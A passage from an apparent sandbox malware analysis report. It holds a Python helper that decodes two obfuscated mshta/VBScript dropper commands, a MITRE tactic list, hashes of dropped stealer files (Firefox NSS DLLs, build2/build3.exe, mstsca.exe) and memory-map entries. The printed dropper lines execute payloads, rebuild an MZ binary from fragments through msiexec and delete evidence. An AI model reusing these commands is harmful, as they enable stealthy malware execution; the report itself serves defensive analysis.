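STAGE1 = r'''"C:\Windows\System32\mshta.exe" vbscRipT: ClosE ( cReatEobJeCt ( "WsCriPT.shelL" ). ruN ( "Cmd /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7C04.exe"" > CW8KXz0H.Exe && START CW8kxZ0H.exe -pg3MYeIUhufHfaRXpQElEvC &iF """" == """" for %n in ( ""C:\Users\Admin\AppData\Local\Temp\7C04.exe"" ) do taskkill -f -IM ""%~NXn"" " , 0, TRuE ) )'''
STAGE2 = r'''"C:\Windows\System32\mshta.exe" vBSCript: cLose ( crEATeobjEct ( "wSCRiPt.SHELl" ). run ( "CMd.exe /C echo | sET /P = ""MZ"" > 3E_W1GCB.Vng & Copy /y /B 3E_w1GCb.VNG + Cnq6kZ.l +j4HWCrT.QO WF2ZlH.FM & sTart msiexec -Y .\Wf2zlH.FM & deL CnQ6kZ.L j4HWCRT.QO 3E_W1GCb.Vng " , 0 , TrUE ) )'''

if __name__ == "__main__":
    for stage in (STAGE1, STAGE2):
        for key, value in analyze(stage).items():
            print(f"{key}: {value}")
        print()
```

The unwrapped STAGE1 command is, up to cmd.exe's own whitespace normalisation, exactly the cmd.exe child recorded under PID 1040 in the tree, which is a quick way to confirm the regex is recovering the real inner command rather than a fragment. The concat_parts/concat_output/msiexec_module fields from STAGE2 give the three on-disk fragments and the reassembled module to collect from the host before the trailing del runs.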
Network
MITRE ATT&CK Matrix (tactics): Command and Control, Credential Access, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Privilege Escalation
Downloads

The six C:\ProgramData DLLs below are the Mozilla NSS libraries (freebl3, mozglue, nss3, softokn3) and the MSVC runtime they need (msvcp140, vcruntime140); stealers drop them to decrypt Firefox's stored logins, and the cmd.exe self-delete lines in the process tree remove them afterwards with "del C:\ProgramData\*.dll". The CryptnetUrlCache entries are Windows' own certificate and revocation fetches triggered by the samples' HTTPS traffic, not malware artefacts.
                • C:\ProgramData\freebl3.dll

                  MD5

                  ef2834ac4ee7d6724f255beaf527e635

                  SHA1

                  5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                  SHA256

                  a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                  SHA512

                  c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                • C:\ProgramData\mozglue.dll

                  MD5

                  8f73c08a9660691143661bf7332c3c27

                  SHA1

                  37fa65dd737c50fda710fdbde89e51374d0c204a

                  SHA256

                  3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                  SHA512

                  0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                • C:\ProgramData\msvcp140.dll

                  MD5

                  109f0f02fd37c84bfc7508d4227d7ed5

                  SHA1

                  ef7420141bb15ac334d3964082361a460bfdb975

                  SHA256

                  334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                  SHA512

                  46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                • C:\ProgramData\nss3.dll

                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\softokn3.dll

                  MD5

                  a2ee53de9167bf0d6c019303b7ca84e5

                  SHA1

                  2a3c737fa1157e8483815e98b666408a18c0db42

                  SHA256

                  43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                  SHA512

                  45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                • C:\ProgramData\vcruntime140.dll

                  MD5

                  7587bf9cb4147022cd5681b015183046

                  SHA1

                  f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                  SHA256

                  c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                  SHA512

                  0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

                  MD5

                  3183751859498c44f6d0ee8e2aab2c17

                  SHA1

                  3948927d001256209b5e4b25003c3c4ccb9ad6bc

                  SHA256

                  fd7b40ffbaccd347c4daa2d0530a3b74114fcb55c78423d67750a8be92c70a28

                  SHA512

                  88de4b4c2818650f7080a9afdcbe8764f1604bbf77f08f2ce286beb5a00e6cb30352f6180f64e7b5d9790a1e5ebefde6e62d8221e55228942d5652a1e0cd4fa6

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                  MD5

                  54e9306f95f32e50ccd58af19753d929

                  SHA1

                  eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                  SHA256

                  45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                  SHA512

                  8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                  MD5

                  98a2414b3a6062f69b5e91e8ef853e60

                  SHA1

                  a7c76d8cc77cc535d73bc6b0ee4f64527572145d

                  SHA256

                  cea0b3398c3a6ac31f4582a21afb131878dfd3e489d101af94fd3d682000dba3

                  SHA512

                  d186ac4f87a04cc56d2a120d1aa7d96f1574ac7353a7d8b237452260f11a3ebfadb556eb46ee894c75ae1bdc6dae480599c6109eb25873074546847d158dddda

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E71BF9BF847F24881CE6680EA97ACE55

                  MD5

                  8131ec5e610b9dfb97f6c297735f1fd4

                  SHA1

                  5f77b785b4c8f48412961311203e08d137b6eb9c

                  SHA256

                  c3475032ae5ac81536e4c6cec89994e3acea355130450adc29b5e201977e473a

                  SHA512

                  3e1f2a593e5003cd18ac65468580ce0fdad3b1ac5213eb8ea91974808e1bf9cea3a23ca9950aad9425fd275f610de7c34e6e4b7cc8f4a45ae40bb400c6ab640f

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

                  MD5

                  2b509cacf815d2033d0634d27cdea10e

                  SHA1

                  ea6bcd9c717745920a7c442c55d0afef40f8f29c

                  SHA256

                  566c8d33a814d23c6a87ea7c1b9e45bc58cb90894815d18522d022e0cc5ed38f

                  SHA512

                  8146db57ff58f6dec06821400d9c50ec3291760a13dba7cdbc29a27d621d33cd7fe5c2b48b82f2e6da7bc7663714df8e28bfd67cb7c0d08dc49da76ce087a34d

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                  MD5

                  474e10b2625b8e5620d57866d05bff95

                  SHA1

                  dd75ca2f436ba682f4cc70359754d0d74a904c9e

                  SHA256

                  237007698b53c2aa6d29de551e101910801c845dc8e955db4f80e0da85d9c35c

                  SHA512

                  0c078dc7db6a2777c21b426f5acfdb5f0a765f15192583ac6ac022dc727cd4a40775e9e03639d215a7dd98fd17c7cd2ae90f7c76c9f58c17d673affc39c0b6cc

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                  MD5

                  d3bd9269b800cc685f1671fdb132d9db

                  SHA1

                  6a14e38905f9d571906fdbaecd4ecbf7851655ad

                  SHA256

                  891ebd90973b0b81c2ba876deba9e96e9ed029184c4bf19e3a75ebb116ecc36b

                  SHA512

                  c984795e956027fba00bc12e20a3a97e3fe1f18b48116cb54cd0cf4da57ed00ffa03ae0b532d57afbf5a05711f9b74566dbcd3e3f5194e28a040230564a6264d

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E71BF9BF847F24881CE6680EA97ACE55

                  MD5

                  0a22c429d9cf886b4327bd675087aa92

                  SHA1

                  8e80b42f2a2be54963d38cd81a787b7f52be58bf

                  SHA256

                  bba43df16a74e0b60b7adac890ab7be133aca4d253ae113779679c104a9a5f49

                  SHA512

                  0a6fced77bf8f37421216994e06011e97c8fa030cd8f1a11d1e1390a28ec880597271ab183f87a43b60791f02122d1532533d464e657e2ad3614a89392858919

                • C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build2.exe

                  MD5

                  a2ef57bbe3a8af95196a419a7962bfaa

                  SHA1

                  1a0c42723cd1e2e947f904619de7fcea5ca4a183

                  SHA256

                  4bc52cd8296fcffc22b5ca8ebf2b161260d71c8d34658f45c9c93cf6d65749e9

                  SHA512

                  ca4781632cc0fb2c53f1ae0d0b798da386514f58b6a48845197eea05da7af162405dee1d4b139e661798c29a095e50cdde9f193dea4a9c5366ee763a899ac160

                • C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build3.exe

                  MD5

                  0fea771099e342facd95a9d659548919

                  SHA1

                  9f8b56a37870f8b4ac5aa0ff5677a666f94c7197

                  SHA256

                  6f032f671284b3812373e90b0ab5b16ea737bd7dc87d22b8f2aabe558334e403

                  SHA512

                  2c1eeb2909acdc1ac36a677dba5131775e97dd107cd60f03bc6672be1791b2dd83a9f588719cb376cc4771570c6b2c202e783e30450ae3c2aa48bbaf2ee049c3

                • C:\Users\Admin\AppData\Local\5715edab-3042-4097-9ffa-cf70482c474f\78D5.exe

                  MD5

                  366535d10fb66ea2549d7f79f96813ac

                  SHA1

                  9d22040fbdb3939518b5a7711a7fb62a936d4dce

                  SHA256

                  5415514f89da1adc03e5497933f0079c9513506b967ac0758aca56784ea7d236

                  SHA512

                  f087b1343ba072fd0251610810909697c3bcdb81b003baacb9bd0a16dd2e13d2687c67ad35eaabce93eaa1d4f0b57f36f75b86437232fd7a53bf2fd46e2ae4c4

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\58CO2Y0O\nss3[1].dll

                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HBPS4WXS\mozglue[1].dll

                  MD5

                  8f73c08a9660691143661bf7332c3c27

                  SHA1

                  37fa65dd737c50fda710fdbde89e51374d0c204a

                  SHA256

                  3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                  SHA512

                  0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HBPS4WXS\vcruntime140[1].dll

                  MD5

                  7587bf9cb4147022cd5681b015183046

                  SHA1

                  f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                  SHA256

                  c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                  SHA512

                  0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OY8D4S7I\msvcp140[1].dll

                  MD5

                  109f0f02fd37c84bfc7508d4227d7ed5

                  SHA1

                  ef7420141bb15ac334d3964082361a460bfdb975

                  SHA256

                  334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                  SHA512

                  46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QT2UOKDP\freebl3[1].dll

                  MD5

                  ef2834ac4ee7d6724f255beaf527e635

                  SHA1

                  5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                  SHA256

                  a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                  SHA512

                  c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QT2UOKDP\softokn3[1].dll

                  MD5

                  a2ee53de9167bf0d6c019303b7ca84e5

                  SHA1

                  2a3c737fa1157e8483815e98b666408a18c0db42

                  SHA256

                  43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                  SHA512

                  45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                • C:\Users\Admin\AppData\Local\Temp\3E_W1GCB.Vng

                  MD5

                  ac6ad5d9b99757c3a878f2d275ace198

                  SHA1

                  439baa1b33514fb81632aaf44d16a9378c5664fc

                  SHA256

                  9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

                  SHA512

                  bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

                • C:\Users\Admin\AppData\Local\Temp\78D5.exe

                  MD5

                  366535d10fb66ea2549d7f79f96813ac

                  SHA1

                  9d22040fbdb3939518b5a7711a7fb62a936d4dce

                  SHA256

                  5415514f89da1adc03e5497933f0079c9513506b967ac0758aca56784ea7d236

                  SHA512

                  f087b1343ba072fd0251610810909697c3bcdb81b003baacb9bd0a16dd2e13d2687c67ad35eaabce93eaa1d4f0b57f36f75b86437232fd7a53bf2fd46e2ae4c4

                • C:\Users\Admin\AppData\Local\Temp\7A0F.exe

                  MD5

                  838ef7134f87a30f65b0087c798ab3b9

                  SHA1

                  ca97744e4263c0ef079f93adbdb1817e7e021503

                  SHA256

                  443bb42a693a17c4a6994230003e848a84a309ffbb748da22071503ae376406c

                  SHA512

                  432318aa95ad3630c61b116375da5dbad7fadbe970dce6c2f6e4889a501419e888fca0337fa588f2851b750177a500438445d3774df63193c6efd64b2a4edab5

                • C:\Users\Admin\AppData\Local\Temp\7C04.exe

                  MD5

                  5acb58759c588fcd04de01631dfa1b48

                  SHA1

                  d49b5b8b0aa8ec8a455cb49a051a41e6cd55aab1

                  SHA256

                  7d605cd1917dc4447d162fe9822eb3e126fb3925c90501e3f06a01bea42852cb

                  SHA512

                  a9c3afec70c8571021dfd7732a96ec0bee37d35ca55e74ddd9dfe29db14f0211c17400432a923ad1f4a12f752c6697f189c7ae09c983d7546a9e6a45f4bc8396

                • C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe

                  MD5

                  5acb58759c588fcd04de01631dfa1b48

                  SHA1

                  d49b5b8b0aa8ec8a455cb49a051a41e6cd55aab1

                  SHA256

                  7d605cd1917dc4447d162fe9822eb3e126fb3925c90501e3f06a01bea42852cb

                  SHA512

                  a9c3afec70c8571021dfd7732a96ec0bee37d35ca55e74ddd9dfe29db14f0211c17400432a923ad1f4a12f752c6697f189c7ae09c983d7546a9e6a45f4bc8396

                • C:\Users\Admin\AppData\Local\Temp\Cnq6kZ.l

                  MD5

                  aab976eaca7b12086b8c192cc00ae276

                  SHA1

                  f4ca20b2a1fc8c9bc38ac0d8ef03fcba5339199a

                  SHA256

                  f049cff5a59f04a1472ea2864147863fe32ecc4d182d1f700aa69ffcaa7a295f

                  SHA512

                  1214cb0917a2949c13bf14a418324c5ca73c21830022c40c862b5cf0eca8e6b1e2a77a59235a9ece531a680f72581375d648d290051da3988c6e829fd6efad20

                • C:\Users\Admin\AppData\Local\Temp\Wf2zlH.FM

                  MD5

                  7c5b0ef77b8e8b1bdcdd42c6c936b6a9

                  SHA1

                  e22c3b411cdd647273f20ec07888b17738584c23

                  SHA256

                  d7a78697f404013d91f5ce664d5397b9ad564b69e7241273033e9767a177d9bb

                  SHA512

                  c0c7666e7e76d6798cf152ce11b0aa0c2445f7ec9597d088a33df5bb452f68e0d790a70ced532cfae36a08f629ac343edc80ac06fed1970f732a71b016a63826

                • C:\Users\Admin\AppData\Local\Temp\j4HWCrT.QO

                  MD5

                  faaf4e3f9be054cd4b5f7929bb72fbe3

                  SHA1

                  63d347b7d60b788c6c8efc6dfc60f9f9ae75ec52

                  SHA256

                  3bf111f56e7961126cede5b6e9f80c507d96cbe814deb6eeb729b1e6ee14558d

                  SHA512

                  f98ab8858ffbfd4c73753a335f96a8b0dbb48c469a209759db2678cdc0db16ab34d8a8d83fc629535b023b66379b6fd89730423ec733807b215ab3c9ff3cefd2

                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                  MD5

                  0fea771099e342facd95a9d659548919

                  SHA1

                  9f8b56a37870f8b4ac5aa0ff5677a666f94c7197

                  SHA256

                  6f032f671284b3812373e90b0ab5b16ea737bd7dc87d22b8f2aabe558334e403

                  SHA512

                  2c1eeb2909acdc1ac36a677dba5131775e97dd107cd60f03bc6672be1791b2dd83a9f588719cb376cc4771570c6b2c202e783e30450ae3c2aa48bbaf2ee049c3

                • \ProgramData\mozglue.dll

                  MD5

                  8f73c08a9660691143661bf7332c3c27

                  SHA1

                  37fa65dd737c50fda710fdbde89e51374d0c204a

                  SHA256

                  3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                  SHA512

                  0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                • \ProgramData\nss3.dll

                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \Users\Admin\AppData\Local\Temp\1105.tmp

                  MD5

                  50741b3f2d7debf5d2bed63d88404029

                  SHA1

                  56210388a627b926162b36967045be06ffb1aad3

                  SHA256

                  f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                  SHA512

                  fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                • \Users\Admin\AppData\Local\Temp\WF2ZlH.FM

                  MD5

                  7c5b0ef77b8e8b1bdcdd42c6c936b6a9

                  SHA1

                  e22c3b411cdd647273f20ec07888b17738584c23

                  SHA256

                  d7a78697f404013d91f5ce664d5397b9ad564b69e7241273033e9767a177d9bb

                  SHA512

                  c0c7666e7e76d6798cf152ce11b0aa0c2445f7ec9597d088a33df5bb452f68e0d790a70ced532cfae36a08f629ac343edc80ac06fed1970f732a71b016a63826

                • memory/196-185-0x0000000000400000-0x0000000000406000-memory.dmp

                • memory/196-190-0x0000000000400000-0x0000000000406000-memory.dmp

                • memory/196-186-0x0000000000401AFA-mapping.dmp

                • memory/516-138-0x0000000000000000-mapping.dmp

                • memory/656-139-0x0000000000000000-mapping.dmp

                • memory/684-188-0x0000000000000000-mapping.dmp

                • memory/688-144-0x00000000049A6000-0x0000000004A38000-memory.dmp

                • memory/688-142-0x0000000000000000-mapping.dmp

                • memory/1020-219-0x0000000000000000-mapping.dmp

                • memory/1040-141-0x0000000000000000-mapping.dmp

                • memory/1356-238-0x0000000003330000-0x0000000003334000-memory.dmp

                • memory/1560-148-0x0000000000400000-0x0000000000537000-memory.dmp

                • memory/1560-146-0x0000000000424141-mapping.dmp

                • memory/1848-235-0x0000000000401AFA-mapping.dmp

                • memory/1952-149-0x0000000000000000-mapping.dmp

                • memory/1952-151-0x0000000000610000-0x0000000000611000-memory.dmp

                • memory/1952-152-0x0000000000610000-0x0000000000611000-memory.dmp

                • memory/1976-220-0x0000000000000000-mapping.dmp

                • memory/1984-163-0x0000000000000000-mapping.dmp

                • memory/2112-221-0x0000000000000000-mapping.dmp

                • memory/2172-137-0x0000000000400000-0x0000000000537000-memory.dmp

                • memory/2172-129-0x0000000000400000-0x0000000000537000-memory.dmp

                • memory/2172-130-0x0000000000424141-mapping.dmp

                • memory/2396-158-0x0000000000000000-mapping.dmp

                • memory/2448-222-0x0000000000000000-mapping.dmp

                • memory/2596-198-0x0000000000400000-0x00000000004D9000-memory.dmp

                • memory/2596-195-0x00000000004A18CD-mapping.dmp

                • memory/2596-194-0x0000000000400000-0x00000000004D9000-memory.dmp

                • memory/2676-159-0x0000000000000000-mapping.dmp

                • memory/3060-119-0x00000000008E0000-0x00000000008F6000-memory.dmp

                • memory/3140-135-0x0000000000120000-0x0000000000121000-memory.dmp

                • memory/3140-131-0x0000000000000000-mapping.dmp

                • memory/3140-134-0x0000000000120000-0x0000000000121000-memory.dmp

                • memory/3184-237-0x0000000000000000-mapping.dmp

                • memory/3472-118-0x0000000000400000-0x0000000002F02000-memory.dmp

                • memory/3472-115-0x00000000031E9000-0x00000000031F2000-memory.dmp

                • memory/3472-116-0x0000000002F10000-0x000000000305A000-memory.dmp

                • memory/3488-181-0x0000000000000000-mapping.dmp

                • memory/3488-189-0x0000000003250000-0x000000000339A000-memory.dmp

                • memory/3488-184-0x0000000003539000-0x0000000003549000-memory.dmp

                • memory/3576-224-0x0000000000000000-mapping.dmp

                • memory/3744-160-0x0000000000000000-mapping.dmp

                • memory/4412-176-0x0000000000400000-0x0000000002F75000-memory.dmp

                • memory/4412-124-0x0000000000000000-mapping.dmp

                • memory/4412-175-0x0000000004AF0000-0x0000000004BC6000-memory.dmp

                • memory/4448-223-0x0000000000000000-mapping.dmp

                • memory/4492-128-0x0000000004B10000-0x0000000004C2B000-memory.dmp

                • memory/4492-123-0x0000000004A5D000-0x0000000004AEF000-memory.dmp

                • memory/4492-120-0x0000000000000000-mapping.dmp

                • memory/4720-162-0x0000000000000000-mapping.dmp

                • memory/4888-164-0x0000000000000000-mapping.dmp

                • memory/4944-177-0x0000000000000000-mapping.dmp

                • memory/4944-180-0x0000000003309000-0x0000000003385000-memory.dmp

                • memory/4944-197-0x0000000004C90000-0x0000000004D66000-memory.dmp

                • memory/4956-170-0x0000000000920000-0x0000000000921000-memory.dmp

                • memory/4956-169-0x0000000000920000-0x0000000000921000-memory.dmp

                • memory/4956-174-0x0000000004EF0000-0x0000000004F9B000-memory.dmp

                • memory/4956-168-0x0000000000000000-mapping.dmp

                • memory/4956-191-0x0000000004FA0000-0x0000000005044000-memory.dmp

                • memory/4956-192-0x0000000005050000-0x00000000050E2000-memory.dmp

                • memory/4956-173-0x0000000004D90000-0x0000000004E3B000-memory.dmp

                • memory/4984-161-0x0000000000000000-mapping.dmp